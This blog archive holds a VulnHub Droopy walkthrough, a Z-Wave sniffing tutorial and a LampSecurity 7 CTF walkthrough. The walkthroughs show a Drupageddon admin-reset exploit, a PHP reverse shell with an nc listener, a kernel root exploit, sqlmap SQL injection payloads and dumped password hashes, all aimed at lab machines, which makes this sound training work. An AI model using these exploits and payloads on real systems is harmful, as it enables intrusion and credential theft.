Friday, 29 April 2016

Walkthrough Droopy v.02

Walkthrough Droopy v.02 :

In this post I outline the steps I followed to get root on Droopy, hosted at VulnHub: https://www.vulnhub.com/entry/droopy-v02,143/.

From this post onwards I shall try to list all the useful links I used to compromise the box, for posterity.

Detailed steps to root:

An nmap scan of the box reveals that only port 80 is open and there seems to be a Drupal 7 website hosted. After running nikto and dirbuster I decided to run a tool to enumerate CMSs. I know a good one exists for WordPress, but surprisingly I could not find much for Drupal. I did come across a tool called CMSmap which, according to its GitHub page, enumerates WordPress, Drupal and Joomla. I decided to give this a try to see what information it could reveal. I also really wanted to learn about Drupal enumeration tools and techniques.

Since the tool is not shipped with Kali, I followed the GitHub instructions and built it on my box.

./cmsmap.py -t http://192.168.238.132/ -f D -F
[-] Date & Time: 29/04/2016 07:31:43
[-] Target: http://192.168.238.132
[M] Website Not in HTTPS: http://192.168.238.132
[I] Server: Apache/2.4.7 (Ubuntu)
[I] X-Powered-By: PHP/5.5.9-1ubuntu4.5
[L] X-Generator: Drupal 7 (http://drupal.org)
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://192.168.238.132/robots.txt
[I] CMS Detection: Drupal
[I] Drupal Version: 7.30
[H] Drupal Vulnerable to SA-CORE-2014-005
[I] Drupal Theme: bartik
[-] Enumerating Drupal Usernames via "Views" Module...
[I] Autocomplete Off Not Found: http://192.168.238.132/?q=user
[-] Drupal Default Files:
[I] http://192.168.238.132/README.txt
[I] http://192.168.238.132/INSTALL.mysql.txt
[I] http://192.168.238.132/MAINTAINERS.txt
[I] http://192.168.238.132/profiles/standard/translations/README.txt
[I] http://192.168.238.132/profiles/minimal/translations/README.txt
[I] http://192.168.238.132/INSTALL.pgsql.txt
[I] http://192.168.238.132/UPGRADE.txt
[I] http://192.168.238.132/CHANGELOG.txt
[I] http://192.168.238.132/INSTALL.sqlite.txt
[I] http://192.168.238.132/LICENSE.txt
[I] http://192.168.238.132/INSTALL.txt
[I] http://192.168.238.132/COPYRIGHT.txt
[I] http://192.168.238.132/web.config
[I] http://192.168.238.132/modules/README.txt
[I] http://192.168.238.132/modules/simpletest/files/README.txt
[I] http://192.168.238.132/modules/simpletest/files/javascript-1.txt
[I] http://192.168.238.132/modules/simpletest/files/php-1.txt
[I] http://192.168.238.132/modules/simpletest/files/sql-1.txt
[I] http://192.168.238.132/modules/simpletest/files/html-1.txt
[I] http://192.168.238.132/modules/simpletest/tests/common_test_info.txt
[I] http://192.168.238.132/modules/filter/tests/filter.url-output.txt
[I] http://192.168.238.132/modules/filter/tests/filter.url-input.txt
[I] http://192.168.238.132/modules/search/tests/UnicodeTest.txt
[I] http://192.168.238.132/themes/README.txt
[I] http://192.168.238.132/themes/stark/README.txt
[I] http://192.168.238.132/sites/README.txt
[I] http://192.168.238.132/sites/all/modules/README.txt
[I] http://192.168.238.132/sites/all/themes/README.txt
[I] http://192.168.238.132/modules/simpletest/files/html-2.html
[I] http://192.168.238.132/modules/color/preview.html
[I] http://192.168.238.132/themes/bartik/color/preview.html
[-] Interesting Directories/Files ...
[L] http://192.168.238.132/info.php
[L] http://192.168.238.132/install.php
[I] Forgotten Password Allows Username Enumeration: http://192.168.238.132/?q=user/password
[-] Search Drupal Modules ...
[I] comment
[I] content
[I] field
[I] node
[I] search
[I] system
[I] user
[I] aggregator
[I] block
[I] blog
[I] book
[I] color
[I] comment
[I] contact
[I] contextual
[I] dashboard
[I] dblog
[I] field
[I] field_ui
[I] file
[I] filter
[I] forum
[I] help
[I] image
[I] locale
[I] menu
[I] node
[I] openid
[I] overlay
[I] path
[I] php
[I] poll
[I] profile
[I] rdf
[I] search
[I] shortcut
[I] simpletest
[I] statistics
[I] syslog
[I] system
[I] taxonomy
[I] toolbar
[I] tracker
[I] translation
[I] trigger
[I] update
[I] user
[I] Checking for Directory Listing Enabled ...
[L] http://192.168.238.132/includes/
[L] http://192.168.238.132/misc/
[L] http://192.168.238.132/modules/
[L] http://192.168.238.132/profiles/
[L] http://192.168.238.132/scripts/
[L] http://192.168.238.132/sites/
[L] http://192.168.238.132/includes/
[L] http://192.168.238.132/themes/
[L] http://192.168.238.132/modules/comment
[L] http://192.168.238.132/modules/field
[L] http://192.168.238.132/modules/node
[L] http://192.168.238.132/modules/search
[L] http://192.168.238.132/modules/system
[L] http://192.168.238.132/modules/user
[L] http://192.168.238.132/modules/aggregator
[L] http://192.168.238.132/modules/block
[L] http://192.168.238.132/modules/blog
[L] http://192.168.238.132/modules/book
[L] http://192.168.238.132/modules/color
[L] http://192.168.238.132/modules/comment
[L] http://192.168.238.132/modules/contact
[L] http://192.168.238.132/modules/contextual
[L] http://192.168.238.132/modules/dashboard
[L] http://192.168.238.132/modules/dblog
[L] http://192.168.238.132/modules/field
[L] http://192.168.238.132/modules/field_ui
[L] http://192.168.238.132/modules/file
[L] http://192.168.238.132/modules/filter
[L] http://192.168.238.132/modules/forum
[L] http://192.168.238.132/modules/help
[L] http://192.168.238.132/modules/image
[L] http://192.168.238.132/modules/locale
[L] http://192.168.238.132/modules/menu
[L] http://192.168.238.132/modules/node
[L] http://192.168.238.132/modules/openid
[L] http://192.168.238.132/modules/overlay
[L] http://192.168.238.132/modules/path
[L] http://192.168.238.132/modules/php
[L] http://192.168.238.132/modules/poll
[L] http://192.168.238.132/modules/profile
[L] http://192.168.238.132/modules/rdf
[L] http://192.168.238.132/modules/search
[L] http://192.168.238.132/modules/shortcut
[L] http://192.168.238.132/modules/simpletest
[L] http://192.168.238.132/modules/statistics
[L] http://192.168.238.132/modules/syslog
[L] http://192.168.238.132/modules/system
[L] http://192.168.238.132/modules/taxonomy
[L] http://192.168.238.132/modules/toolbar
[L] http://192.168.238.132/modules/tracker
[L] http://192.168.238.132/modules/translation
[L] http://192.168.238.132/modules/trigger
[L] http://192.168.238.132/modules/update
[L] http://192.168.238.132/modules/user
[-] Date & Time: 29/04/2016 07:37:02
[-] Completed in: 0:05:19


The tool was quite good at enumerating the Drupal website and immediately tells us that the site is outdated (Drupal 7.30) and suffers from a known vulnerability: "Drupal Vulnerable to SA-CORE-2014-005".
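As an added illustration (not part of the original post and not CMSmap code), here is a small Python check that reproduces the kind of findings above from a captured set of response headers and the first line of the world-readable CHANGELOG.txt: it reports the version-disclosing headers, the missing hardening headers, and whether the Drupal version predates the SA-CORE-2014-005 fix. The headers and CHANGELOG text are constructed samples matching the scan output, and the fix version 7.32 is taken from the advisory, not from the post.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: the response headers CMSmap reported above, as a plain dict.
SAMPLE_HEADERS = {
    "Server": "Apache/2.4.7 (Ubuntu)",
    "X-Powered-By": "PHP/5.5.9-1ubuntu4.5",
    "X-Generator": "Drupal 7 (http://drupal.org)",
    "Content-Type": "text/html; charset=utf-8",
}

# Constructed sample: the first line of a Drupal 7.30 CHANGELOG.txt, one of the
# world-readable default files listed in the scan above.
SAMPLE_CHANGELOG = "Drupal 7.30, 2014-07-24\n-----------------------\n- Fixed security issues.\n"

# SA-CORE-2014-005 (Drupal core SQL injection) was fixed in Drupal 7.32; this version
# number comes from the advisory, not from the post.
SA_CORE_2014_005_FIXED = (7, 32)

# Hardening headers the scan reported as "Not Enforced" (CMSmap also checks the legacy
# X-Content-Security-Policy name, so either spelling is accepted here).
EXPECTED_HEADERS = {
    "X-Frame-Options": ("x-frame-options",),
    "Strict-Transport-Security": ("strict-transport-security",),
    "Content-Security-Policy": ("content-security-policy", "x-content-security-policy"),
    "X-Content-Type-Options": ("x-content-type-options",),
}


def parse_drupal_version(changelog: str) -> Tuple[int, int]:
    """Return (major, minor) from a CHANGELOG.txt banner such as 'Drupal 7.30, 2014-07-24'."""
    m = re.match(r"Drupal\s+(\d+)\.(\d+)", changelog)
    if not m:
        raise ValueError("no Drupal version banner found")
    return int(m.group(1)), int(m.group(2))


def assess(headers: Dict[str, str], changelog: str) -> List[str]:
    """Produce findings in the scanner's own [L]/[I]/[H] style."""
    findings: List[str] = []
    lower = {k.lower(): v for k, v in headers.items()}   # header names are case-insensitive
    for leaky in ("Server", "X-Powered-By", "X-Generator"):
        if leaky.lower() in lower:
            findings.append(f"[L] {leaky} discloses: {lower[leaky.lower()]}")
    for name, spellings in EXPECTED_HEADERS.items():
        if not any(s in lower for s in spellings):
            findings.append(f"[I] {name}: Not Enforced")
    major, minor = parse_drupal_version(changelog)
    # Only the 7.x branch was affected; anything before the fix release is flagged.
    if major == 7 and (major, minor) < SA_CORE_2014_005_FIXED:
        findings.append(f"[H] Drupal {major}.{minor} predates the SA-CORE-2014-005 fix "
                        f"({SA_CORE_2014_005_FIXED[0]}.{SA_CORE_2014_005_FIXED[1]})")
    return findings


if __name__ == "__main__":
    for line in assess(SAMPLE_HEADERS, SAMPLE_CHANGELOG):
        print(line)
```

The same check run against a site that strips the disclosing headers and removes CHANGELOG.txt returns nothing useful, which is the point of doing both.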

SA-CORE-2014-005 is the Drupal core SQL injection ("Drupageddon"), so there is a possibility of launching SQL injection attacks against the box. I decided to use an existing exploit: https://www.exploit-db.com/exploits/34984/ uses the injection to change the admin credentials on the backend site.

python drupal_exploit.py http://192.168.238.132/ admin hello
host username password
http://nope.io admin wowsecure
Success!
Login now with user:admin and pass:hello


The exploit worked and we have changed the admin credentials on the box. We now log in with the credentials "admin:hello".

Once logged in we are able to create additional posts/pages. Checking under the "Modules" tab I see that there is a core module called "PHP filter" which can be enabled to allow PHP code inside page content to be executed by the web server. This opens the possibility of executing a PHP reverse shell by creating a page containing it and requesting that page. Hence we try this approach. I use the standard reverse shell from pentestmonkey.

nc -lvnp 4545
listening on [any] 4545 ...
connect to [192.168.238.133] from (UNKNOWN) [192.168.238.132] 51139
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
09:46:02 up 1:33, 0 users, load average: 0.05, 0.03, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ uname -a
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ hostname
droopy
$ cat /etc/issue
Ubuntu 14.04.1 LTS \n \l
$ arch
x86_64



Once we get a reverse shell we see that the box is 64-bit Ubuntu 14.04 on kernel 3.13.0-43, which is known to be vulnerable to the local privilege escalation exploit at https://www.exploit-db.com/exploits/37292/. We compile and run the exploit to get root on the box.

$ gcc ubuntu_ex.c -o ub
gcc ubuntu_ex.c -o ub
$ ./ub
./ub
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#

Also, for completeness, I must admit I could have used a Metasploit module to get a shell, but I wanted to avoid using Metasploit as much as possible :0

Final Verdict:

Overall it was a relatively easy box to pwn, but fun nevertheless. Thanks to the creator for taking the time to make one. Keep up the good work, "knightmare".

Useful Links:

https://github.com/Dionach/CMSmap
https://www.drupal.org/SA-CORE-2014-005
https://www.exploit-db.com/exploits/37292/
https://www.rapid7.com/db/modules/exploit/multi/http/drupal_drupageddon

Wednesday, 13 April 2016

Z-wave protocol analysis using Ez-Wave

Background: Recently I was able to get my hands on a couple of IoT devices talking the proprietary Z-Wave protocol. Specifically I had 2 devices:

i) a Z-Wave 3-in-1 PIR motion sensor, which can detect movement, temperature and luminance.
ii) a Z-Wave smart energy plug, which reports the energy consumption of the device connected to it. It can also switch the device ON/OFF depending on the requests sent to it by a Z-Wave controller.

These devices are already deployed in many smart homes, hence it is important to analyze their security. This got me rolling, and here is a post about how to sniff Z-Wave packets using an SDR. It seems that the state of the art in pentesting any wireless communication protocol is to use these SDRs.

A detailed security assessment of the Z-Wave protocol and Z-Wave enabled devices was presented at ShmooCon 2016 by Joseph Hall and Ben Ramsey in "Breaking Bulbs Briskly by Bogus Broadcasts" (https://www.youtube.com/watch?v=IgquSEhAGvA), which details how many Z-Wave device manufacturers disregard security and don't even encrypt the data exchanged between the Z-Wave device and the Z-Wave controller. This opens up a range of attacks that can be launched against Z-Wave devices. They also released an open source tool, EZ-Wave, to play around with and sniff these packets. In this post I shall try to sniff some of the traffic generated by my Z-Wave devices.

EZ-wave Installation:

Install EZ-wave dependencies:

The installation instructions are detailed on the GitHub site at https://github.com/AFITWiSec/EZ-Wave. However, there are a number of software bundles that need to be installed, especially GNU Radio, which has a lot of dependencies. Hence, instead of installing all these packages myself, I used the Pentoo Linux distribution (http://www.pentoo.ch/about). The advantage of using Pentoo is that all the software required for the EZ-Wave installation, such as GNU Radio, OsmocomSDR, the HackRF host software, Wireshark etc., is pre-installed in the distro, saving the time to install it manually.

The simplest way is to download the Pentoo image from the downloads section of the site and then write it to a live USB stick. One important thing to note here is that Michael Ossmann (maker of the HackRF) highly recommends in his "Introduction to SDR" tutorial (https://greatscottgadgets.com/sdr/) not to connect the HackRF to any virtual machine, for performance reasons, but to use it directly on the base OS. On a side note, if you are a newbie it is highly recommended to go through at least his first tutorial, where he introduces the SDR concepts (https://greatscottgadgets.com/sdr/1/), and also the tutorial on HackRF usage (https://greatscottgadgets.com/sdr/5/).

We now boot from the live USB. (In case you get an error like "boot device not found", press "Tab" on the keyboard and select the pentoo5 OS, or type it and press Enter.) Pentoo should boot correctly. Launch the GUI using the "startx" command. In case no IP address is allocated to the box, just run "dhcpcd eth0" to request one.

Now, to test that the HackRF software is working correctly, plug the HackRF devices into the USB ports and run the command "hackrf_info". I use 2 HackRFs since they are half-duplex and I wish to receive and transmit at the same time.

pentoo tools # hackrf_info
Found HackRF board 0:
Board ID Number: 2 (HackRF One)
Firmware Version: 2014.08.1
Part ID Number: 0xa000cb3c 0x006a434b
Serial Number: 0x00000000 0x00000000 0x14d463dc 0x0f54c1e1
Found HackRF board 1:
Board ID Number: 2 (HackRF One)
Firmware Version: 2014.08.1
Part ID Number: 0xa000cb3c 0x004f434b
Serial Number: 0x00000000 0x00000000 0x14d463dc 0x2f7c35e1
pentoo tools #

Install Scapy-Radio

We can see that both our devices are correctly detected. Next we install the EZ-Wave tool itself. We run the setup.sh script, which clones the scapy-radio framework, and then we install it:

./setup.sh
cd root/scapy-radio
./install.sh scapy
./install.sh blocks
./install.sh grc


I noticed that if you use Pentoo Linux then you don't need to worry about making changes to the GNU Radio config file.

Install Wireshark

We downloaded the source package for Wireshark version 1.12.10 from https://www.wireshark.org/download/src/. Copy the EZ-Wave Wireshark dissector files into wireshark-1.12.10/epan/dissectors. Wireshark by default tries to use Qt 5 for building the UI. This gave me errors, so I chose to build my Wireshark UI with GTK3. Hence it is important to tell Wireshark to use the GTK3 library instead of the Qt 5 libraries at the configure stage. Our steps to build Wireshark were:

pentoo wireshark-1.12.10 # ./autogen.sh
aclocal -I ./aclocal-fallback
libtoolize --copy --force
....
....
....
Now type "./configure [options]" and "make" to compile Wireshark.
pentoo wireshark-1.12.10 # ./configure --with-qt=no --with-gtk3=yes
checking build system type... i686-pc-linux-gnu
checking host system type... i686-pc-linux-gnu
....
....
....
config.status: executing libtool commands
The Wireshark package has been configured with the following options.
Build wireshark (Gtk+) : yes (with GTK+ 3)
Build wireshark-qt : no
Build tshark : yes
Build capinfos : yes
Build captype : yes
Build editcap : yes
Build dumpcap : yes
Build mergecap : yes
Build reordercap : yes
Build text2pcap : yes
Build randpkt : yes
Build dftest : yes
Build rawshark : yes
Save files as pcap-ng by default : yes
Install dumpcap with capabilities : no
Install dumpcap setuid : no
Use dumpcap group : (none)
Use plugins : yes
Use Lua library : yes
Use Python binding : no
Build rtp_player : yes
Build profile binaries : no
Use pcap library : yes
Use zlib library : yes
Use kerberos library : yes (MIT)
Use c-ares library : yes
Use GNU ADNS library : no (using c-ares instead)
Use SMI MIB library : yes
Use GNU crypto library : yes
Use SSL crypto library : no
Use IPv6 name resolution : yes
Use gnutls library : yes
Use POSIX capabilities library : yes
Use GeoIP library : yes
Use nl library : yes (v3)
Use SBC codec library : yes
pentoo wireshark-1.12.10 # make
pentoo wireshark-1.12.10 # sudo make install
pentoo wireshark-1.12.10 # ldconfig


EZ-Wave Usage:

In order to sniff packets we start GNU Radio Companion and give it the Z-Wave radio configuration file as input.

Select the Zwave.grc file to open in GNU Radio Companion

One important thing to take note of in the .grc file is the variable for the centre frequency, i.e. center_freq. The European Z-Wave devices (which I have) talk on 868.42 MHz, instead of the default centre frequency hard-coded in the .grc file, which is for US Z-Wave devices, and hence this variable needs to be changed to reflect the frequency of your device. To change the variable, double-click it and then key in the new value.

gnuradio-companion main window
After changing the .grc file we need to regenerate (compile) the flow graph. Finally we can run it by pressing the play button in the top menu. (Also make sure that the Python modules are in the PYTHONPATH environment variable, else there may be errors.)

The HackRFs should now be able to pick up Z-Wave packets in the vicinity. I forced the Z-Wave device to send some packets by pressing the button on the device body. All the captured Z-Wave packets are sent to localhost:52002 and can be seen in Wireshark using the new dissector. You can apply a filter like !icmp to remove the interrogation commands sent to the Z-Wave devices.

Wireshark Z-wave packet capture

We can see the HomeID and NodeID of the captured Z-Wave packet. The data exchanged between the Z-Wave controller and the Z-Wave device is also not encrypted.
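To make the fields the dissector shows concrete, here is an added Python example (not from the post and not EZ-Wave or scapy-radio code) that builds and parses a raw Z-Wave MAC frame and reports whether its payload is cleartext. The layout assumed is the ITU-T G.9959 frame for the 9.6/40 kbps rates (HomeID, source NodeID, two frame-control bytes, length, destination NodeID, payload, 8-bit XOR checksum seeded with 0xFF); the frame bytes are constructed, and the command-class numbers used to label the payload are the standard Basic (0x20), Binary Switch (0x25), Multilevel Sensor (0x31), Meter (0x32) and Security (0x98) classes.

```python
from dataclasses import dataclass
from typing import Optional

# Command-class identifiers used to label the first payload byte (standard Z-Wave values).
COMMAND_CLASSES = {0x20: "BASIC", 0x25: "SWITCH_BINARY", 0x31: "SENSOR_MULTILEVEL",
                   0x32: "METER", 0x98: "SECURITY"}
# Header type lives in the low nibble of the first frame-control byte (assumption per G.9959).
HEADER_TYPES = {1: "singlecast", 2: "multicast", 3: "ack"}


@dataclass
class ZWaveFrame:
    home_id: int
    src_node: int
    header_type: str
    ack_requested: bool
    seq: int
    dst_node: int
    command_class: Optional[int]
    payload: bytes
    fcs_ok: bool

    @property
    def encrypted(self) -> bool:
        # Only payloads wrapped in the Security command class are encrypted; everything
        # else (like the sensor and plug frames in the capture above) is cleartext.
        return self.command_class == 0x98


def xor_fcs(data: bytes) -> int:
    """8-bit frame check sequence: XOR over every preceding byte, seed 0xFF (G.9959 R1/R2)."""
    fcs = 0xFF
    for b in data:
        fcs ^= b
    return fcs


def build_frame(home_id: int, src: int, dst: int, payload: bytes,
                seq: int = 1, ack_req: bool = True) -> bytes:
    """Assemble a singlecast frame (header type 1) and append its FCS."""
    length = 4 + 1 + 2 + 1 + 1 + len(payload) + 1   # whole MPDU, FCS included
    fc0 = (0x40 if ack_req else 0x00) | 0x01          # bit 6 = ack request, low nibble = type
    fc1 = seq & 0x0F                                  # low nibble = sequence number
    body = home_id.to_bytes(4, "big") + bytes([src, fc0, fc1, length, dst]) + payload
    return body + bytes([xor_fcs(body)])


def parse_frame(raw: bytes) -> ZWaveFrame:
    """Decode a captured frame; a bad length is fatal, a bad FCS is just reported."""
    if len(raw) < 10:
        raise ValueError("frame too short for a Z-Wave MAC header")
    home_id = int.from_bytes(raw[0:4], "big")
    src, fc0, fc1, length, dst = raw[4], raw[5], raw[6], raw[7], raw[8]
    if length != len(raw):
        raise ValueError(f"length field {length} does not match {len(raw)} captured bytes")
    payload = raw[9:-1]
    return ZWaveFrame(
        home_id=home_id, src_node=src,
        header_type=HEADER_TYPES.get(fc0 & 0x0F, "unknown"),
        ack_requested=bool(fc0 & 0x40), seq=fc1 & 0x0F, dst_node=dst,
        command_class=payload[0] if payload else None, payload=payload,
        fcs_ok=xor_fcs(raw[:-1]) == raw[-1],
    )


def describe(frame: ZWaveFrame) -> str:
    """One-line summary in the spirit of the Wireshark packet list."""
    if frame.command_class is None:
        cc = "none"
    else:
        cc = COMMAND_CLASSES.get(frame.command_class, f"0x{frame.command_class:02x}")
    return (f"home {frame.home_id:08x} node {frame.src_node} -> {frame.dst_node} "
            f"{frame.header_type} seq {frame.seq} class {cc} "
            f"{'encrypted' if frame.encrypted else 'CLEARTEXT'} fcs={'ok' if frame.fcs_ok else 'BAD'}")


# Constructed sample: controller (node 1) sends BASIC SET 0xFF ("on") to the plug (node 2).
SAMPLE_BASIC_SET = build_frame(0xC1A2B3D4, 1, 2, bytes([0x20, 0x01, 0xFF]), seq=10)
# Constructed sample: the same pair using the Security class (payload bytes are opaque here).
SAMPLE_SECURE = build_frame(0xC1A2B3D4, 1, 2, bytes([0x98, 0x81, 0x11, 0x22, 0x33]), seq=11)

if __name__ == "__main__":
    for raw in (SAMPLE_BASIC_SET, SAMPLE_SECURE):
        print(raw.hex(), "->", describe(parse_frame(raw)))
```

Frames carrying the 100 kbps rate use a CRC-16 instead of the XOR byte, so the `fcs_ok` check above applies only to the two slower rates named in the lead-in.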


Sunday, 21 February 2016

Walkthrough LampSecurity Version 7

CTF series LAMP SECURITY 7: I have been spending a lot of time trying to improve my hacking skills in order to prepare for my OffSec certification challenge. I have been struggling to improve my average time to compromise a box (remember I need to do 5 in 24 hours to clear the OffSec challenge), so any easy boxes I find along the way are welcome :P They kinda increase my confidence. LampSecurity 7 seems like one such box. I am glad I pwned it, and that too in optimal time (IMHO, since the time can vary greatly depending upon the skill of the person). Thanks to the author for helping me prepare for the exam :-)

Detailed steps to get root:

An nmap scan of the box reveals a number of open services.

Not shown: 64991 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 41:8a:0d:5d:59:60:45:c4:c4:15:f3:8a:8d:c0:99:19 (DSA)
|_ 2048 66:fb:a3:b4:74:72:66:f4:92:73:8f:bf:61:ec:8b:35 (RSA)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Mad Irish Hacking Academy
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MYGROUP)
901/tcp open http Samba SWAT administration server
| http-auth:
| HTTP/1.0 401 Authorization Required
|_ Basic realm=SWAT
| http-methods:
|_ Supported Methods: GET POST
|_http-title: 401 Authorization Required
5900/tcp closed vnc
8080/tcp open http Apache httpd 2.2.15 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.2.15 (CentOS)
| http-title: Admin :: Mad Irish Hacking Academy
|_Requested resource was /login.php
10000/tcp open http MiniServ 1.610 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 9A2006C267DE04E262669D821B57EAD1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: MiniServ/1.610
|_http-title: Login to Webmin
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.13
Uptime guess: 49.711 days (since Thu Dec 24 10:56:35 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.5.10-125.el6)
| Computer name: localhost
| NetBIOS computer name:
| Domain name:
| FQDN: localhost
|_ System time: 2016-01-28T10:39:45-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.74 ms 192.168.116.139


We see a web application running on the box. While playing around with the web application we notice the /newsletter URL; adding a ' to the URL gets a detailed error message printed out, which leads us to believe that the box suffers from SQL injection.



We capture the request using Burp and run sqlmap against it to see if we can find any interesting databases.

cat sql.file
GET /newsletter&id=1 HTTP/1.1
Host: 192.168.116.139
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=pv1evkh5h3rjfajojfdbiqnd72; testing=1; roundcube_sessid=0oo5o02r2217dbff3t53j40j06
Connection: close


sqlmap -r sql.file --dbs
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:47:12
........
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://192.168.116.139:80/newsletter&id=1 AND 6207=6207
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://192.168.116.139:80/newsletter&id=1 AND (SELECT 2804 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(2804=2804,1))),0x716a767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://192.168.116.139:80/newsletter&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xbRE)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: http://192.168.116.139:80/newsletter&id=-9786 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176707671,0x6645506a52417641745455654c44514f5554746b42486e4f496a434c6b6a5372506f766a696a4f4f,0x716a767a71),NULL-- -
---
[11:47:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
[11:47:14] [INFO] fetching database names
[11:47:14] [INFO] the SQL query used returns 4 entries
[11:47:14] [INFO] resumed: information_schema
[11:47:14] [INFO] resumed: mysql
[11:47:14] [INFO] resumed: roundcube
[11:47:14] [INFO] resumed: website
available databases [4]:
[*] information_schema
[*] mysql
[*] roundcube
[*] website


sqlmap is able to enumerate four databases for us, namely i) information_schema, ii) mysql, iii) roundcube and iv) website.

We try to dump the contents of these databases using the sqlmap -D parameter:

sqlmap -r sql.file --dbs -D website --dump
....
....
[11:47:43] [INFO] fetching tables for database: 'website'
[11:47:43] [INFO] the SQL query used returns 9 entries
[11:47:43] [INFO] resumed: contact
[11:47:43] [INFO] resumed: documents
[11:47:43] [INFO] resumed: hits
[11:47:43] [INFO] resumed: log
[11:47:43] [INFO] resumed: newsletter
[11:47:43] [INFO] resumed: payment
[11:47:43] [INFO] resumed: trainings
[11:47:43] [INFO] resumed: trainings_x_users
[11:47:43] [INFO] resumed: users
[11:47:43] [INFO] fetching columns for table 'hits' in database 'website'
....
....
Database: website
Table: users
[13 entries]
+---------+--------------------------------------------------------------------------+-------------------------------+-----------------+-------------------------------------------------+---------------------+
| user_id | profile | username | realname | password | last_login |
+---------+--------------------------------------------------------------------------+-------------------------------+-----------------+-------------------------------------------------+---------------------+
| 4 | <blank> | john@localhost.localdomain | John Durham | 0d9ff2a4396d6939f80ffe09b1280ee1 | NULL |
| 5 | <blank> | alice@localhost.localdomain | Alice Wonder | 2146bf95e8929874fc63d54f50f1d2e3 | NULL |
| 6 | <blank> | ruby@localhost.localdomain | Ruby Spinster | 9f80ec37f8313728ef3e2f218c79aa23 | NULL |
| 7 | <blank> | leon@localhost.localdomain | Leon Parnetta | 5d93ceb70e2bf5daa84ec3d0cd2c731a (qwer1234) | NULL |
| 8 | <blank> | julia@localhost.localdomain | Julia Fields | ed2539fe892d2c52c42a440354e8e3d5 (madrid) | NULL |
| 9 | <blank> | michael@localhost.localdomain | Michael Saint | 9c42a1346e333a770904b2a2b37fa7d3 (somepassword) | NULL |
| 10 | <blank> | bruce@localhost.localdomain | Bruce Pottricks | 3a24d81c2b9d0d9aaf2f10c6c9757d4e | NULL |
| 11 | <blank> | neil@localhost.localdomain | Neil Felstein | 4773408d5358875b3764db552a29ca61 | NULL |
| 12 | <blank> | charles@localhost.localdomain | Charles Adams | b2a97bcecbd9336b98d59d9324dae5cf | NULL |
| 36 | <blank> | foo@bar.com | <blank> | 4cb9c8a8048fd02294477fcb1a41191a (changeme) | NULL |
| 114 | <blank> | <blank> | <blank> | d41d8cd98f00b204e9800998ecf8427e () | NULL |
| 113 | <blank> | test@nowhere.com | <blank> | 098f6bcd4621d373cade4e832627b4f6 (test) | NULL |
| 3 | Brian is our technical brains behind the operations and a chief trainer. | brian@localhost.localdomain | Brian Hershel | e22f07b17f98e0d9d364584ced0e3c18 | 2012-12-19 11:30:54 |
+---------+--------------------------------------------------------------------------+-------------------------------+-----------------+-------------------------------------------------+---------------------+


sqlmap is able to dump the various tables in the website database. We keep dumping the contents of these tables until we see that the `users` table gives a list of users and their password hashes (sqlmap helps us crack these as well; it's so amazing and powerful!). Luckily we see that the passwords are plain unsalted MD5.
